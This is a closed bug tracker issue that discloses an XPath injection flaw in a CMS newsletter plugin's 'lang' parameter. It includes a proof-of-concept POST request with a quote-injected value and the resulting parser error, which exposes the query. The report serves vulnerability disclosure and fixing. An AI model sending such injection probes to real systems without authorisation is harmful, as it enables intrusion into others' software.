Uploaded image for project: 'CMS'
  1. CMS
  2. CMS-5170

XPath Injection Vulnerability (lang param)

    XMLWordPrintable

    Details

    • Type: Bug
    • Status: Closed
    • Priority: Major
    • Resolution: Fixed
    • Affects Version/s: 3.5.1, 3.5.2
    • Fix Version/s: 3.5.3, 3.7
    • Component/s: Plugins (others)
    • Labels:
      None
    • Environment:
      Win 7 Ultimate EN 32bit
      Server: Jetty(6.1.21)

      Description

      The POST parameter 'lang' is vulnerable to xpath injection vulnerability

      --snip--
      POST /cms/plugins/newsletter/category/nodes HTTP/1.1
      Host: localhost:8080
      User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/25.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      X-Requested-With: XMLHttpRequest
      Content-Type: application/x-www-form-urlencoded; charset=UTF-8
      Referer: http://localhost:8080/cms/event/index.html
      Content-Length: 137
      Cookie: ametys.accept.non.supported.navigators=on; JSESSIONID=1na81i031qhdw; __utma=111872281.3880910164568079000.1385252858.1385252858.1385252858.1; __utmb=111872281.1.10.1385252858; __utmc=111872281; __utmz=111872281.1385252858.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
      Connection: keep-alive
      Pragma: no-cache
      Cache-Control: no-cache

      sitename=event&categoriesOnly=&debug=%255Bobject%2520Object%255D&userLocale=en&siteName=event&skin=demo&categoryID=root&lang=en'&node=root

      Response:

      org.apache.jackrabbit.spi.commons.query.xpath.ParseException
      :
      Encountered "\'//element(*, ametys:page)[@ametys-internal:tags =\'" at line 1, column 68.
      Was expecting one of:
      "or" ...
      "and" ...
      "div" ...
      "idiv" ...
      "mod" ...
      "*" ...
      "return" ...
      "to" ...
      "where" ...
      "intersect" ...
      "union" ...
      "except" ...
      <Instanceof> ...
      <Castable> ...
      "/" ...
      "//" ...
      "=" ...
      "is" ...
      ...
      --snip--

        Attachments

          Activity

            People

            • Assignee:
              laurence Laurence Aumeunier
              Reporter:
              liquidworm liquidworm
            • Votes:
              0 Vote for this issue
              Watchers:
              1 Start watching this issue

              Dates

              • Created:
                Updated:
                Resolved: